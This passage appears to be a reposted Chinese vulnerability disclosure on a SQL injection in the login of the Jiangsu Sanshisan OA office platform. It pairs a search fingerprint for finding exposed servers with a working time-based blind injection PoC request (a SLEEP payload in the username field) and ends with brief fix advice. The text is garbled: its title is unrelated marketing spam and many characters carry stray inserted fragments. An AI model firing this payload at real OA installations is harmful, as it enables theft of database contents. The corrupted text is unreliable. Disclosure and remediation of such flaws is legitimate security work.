企業(yè)網(wǎng)站怎么自適應(yīng)網(wǎng)站推廣的營(yíng)銷(xiāo)策劃方案
0x01 漏洞介紹
江蘇叁拾叁-OA是由江蘇叁拾叁信息技術(shù)有限公司開(kāi)發(fā)的一款OA辦公平臺(tái),主要有知識(shí)管理,工作流程,溝通交流,輔助辦公,集成解決方案,應(yīng)用支撐平臺(tái),基礎(chǔ)支撐等功能。 該系統(tǒng)也與江蘇叁拾叁智慧農(nóng)業(yè)研究院的農(nóng)產(chǎn)品電商解決方案、社會(huì)化服務(wù)解決方案、鄉(xiāng)村振興解決方案等進(jìn)行了深度融合。該漏洞存在于login下,username對(duì)接受的傳參沒(méi)有進(jìn)行嚴(yán)格的過(guò)濾,從而導(dǎo)致SQL注入,攻擊者可以利用該漏洞獲取數(shù)據(jù)庫(kù)敏感信息。
0x02 影響版本
江蘇叁拾叁-OA
0x03 語(yǔ)法特征
app="江蘇叁拾叁-OA"
0x04 漏洞復(fù)現(xiàn)
頁(yè)面
?
POC(payload sqlmap梭哈來(lái)的)
POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin
直接sqlmap梭哈來(lái)
?
0x05 漏洞修復(fù)建議
使用參數(shù)化查詢(xún)
對(duì)用戶(hù)輸入進(jìn)行驗(yàn)證和過(guò)濾
限制數(shù)據(jù)庫(kù)賬戶(hù)權(quán)限
更新和打補(bǔ)丁